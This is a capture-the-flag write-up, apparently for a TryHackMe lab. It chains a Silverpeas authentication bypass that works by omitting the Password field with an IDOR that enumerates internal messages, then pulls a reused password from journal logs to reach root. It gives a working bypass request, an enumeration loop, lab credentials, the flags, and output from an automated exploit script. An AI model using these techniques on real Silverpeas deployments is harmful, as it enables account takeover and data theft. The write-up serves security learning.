Overview
Chained two Silverpeas CVEs into SSH access, then pivoted through systemd journal logs to recover a reused database password for full root. CVE-2024-36042 bypasses authentication by omitting the Password field entirely, and CVE-2023-47323 is an IDOR that lets any authenticated user read arbitrary internal messages — including one containing SSH credentials left in a sticky note.
CVE-2024-36042: Auth bypass (omit Password field)
↓
CVE-2023-47323: IDOR on SilverMail → read Message ID 6
↓
SSH creds: tim:cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
↓
user flag: THM{c4ca4238a0b923820dcc509a6f75849b}
↓
adm group → journalctl → Docker DB_PASSWORD=_Zd_zx7N823/
↓
Credential reuse: SSH as tyler → sudo ALL
↓
root flag: THM{098f6bcd4621d373cade4e832627b4f6}Port Scan & Web Enumeration
| Port | Service | Version | Notes |
|---|---|---|---|
22/tcp | SSH | OpenSSH 8.9p1 | Final access vector |
80/tcp | HTTP | nginx 1.18.0 | Static page, mentions scr1ptkiddy + Silverpeas |
8080/tcp | HTTP | Jetty 10.0.18 | Silverpeas 6.3.1 at /silverpeas/ |
Port 80 serves a static page for “Hack Smarter Security” referencing a project manager scr1ptkiddy reachable via an internal Silverpeas instance. Version confirmed via JS file suffixes: 6.3.1.
CVE-2024-36042 — Authentication Bypass
When the Password field is completely omitted (not empty — omitted) from the POST to /silverpeas/AuthenticationServlet, the server authenticates without credential validation:
POST /silverpeas/AuthenticationServlet HTTP/1.1 Host: 10.112.164.140:8080 Content-Type: application/x-www-form-urlencoded Login=SilverAdmin&DomainId=0 // Note: no Password field at all → 302 Redirect to MainFrame.jsp — authenticated as SilverAdmin
CVE-2023-47323 — IDOR on SilverMail
Any authenticated user can read arbitrary internal messages by enumerating the ID parameter — no authorization check:
for mid in range(1, 21):
r = session.get(f"{BASE}/RSILVERMAIL/jsp/ReadMessage.jsp?ID={mid}")
# Check content for credentialsMessage ID 6 contains SSH credentials in plaintext:
From: Administrateur | Date: 13/12/2023 Dude how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes. Username: tim Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
SSH as tim → User Flag
$ ssh tim@10.112.164.140 Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol $ id uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm) $ cat ~/user.txt THM{c4ca4238a0b923820dcc509a6f75849b}
adm Group → Journal Logs → Tyler’s Password
The adm group grants read access to systemd journal logs. Tyler’s Docker run command is logged with the database password in cleartext:
$ journalctl _UID=1000 --no-pager | grep DB_PASSWORD Dec 13 15:45:57 silver-platter sudo[2616]: tyler : TTY=tty1 ; PWD=/ ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ silverpeas:6.3.1
Credential reuse: _Zd_zx7N823/ is also tyler’s system password.
SSH as tyler → sudo → Root Flag
$ ssh tyler@10.112.164.140 Password: _Zd_zx7N823/ $ id uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd) $ sudo cat /root/root.txt THM{098f6bcd4621d373cade4e832627b4f6}
Attack Chain
tim:cm0nt!md0ntf0rg3tth!spa$$w0rdagainloljournalctl → DB_PASSWORD → SSH as tylersudo cat /root/root.txt → Root: THM{098f6bcd4621d373cade4e832627b4f6}Vulnerabilities
| Finding | CVE | Severity | Impact |
|---|---|---|---|
| Silverpeas authentication bypass | CVE-2024-36042 | Critical | Login as any user without credentials |
| SilverMail IDOR | CVE-2023-47323 | Critical | Read arbitrary internal messages |
| Credential reuse (DB → SSH) | — | High | Database password reused as system account password |
| Secrets in Docker CLI arguments | — | High | DB_PASSWORD visible in journal logs permanently |
| Excessive adm group membership | — | Medium | tim can read all system logs including tyler’s commands |
Takeaways
ps, /proc/*/cmdline, and system logs permanently. Use Docker secrets, env files, or vaults.Full Exploit Script
$ python3 silver_platter_auto.py [+] Auth bypass successful — logged in as SilverAdmin [+] Credentials found: tim:cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol [+] USER FLAG: THM{c4ca4238a0b923820dcc509a6f75849b} [+] Found credential in docker run: DB_PASSWORD=_Zd_zx7N823/ [+] ROOT FLAG: THM{098f6bcd4621d373cade4e832627b4f6}
Tools Used
| Tool | Purpose |
|---|---|
nmap | Port scanning and service enumeration |
python3 + requests | Auth bypass + IDOR enumeration |
python3 + paramiko | SSH access and command execution |
journalctl | Systemd journal log analysis |
silver_platter_auto.py | Full automated exploit chain |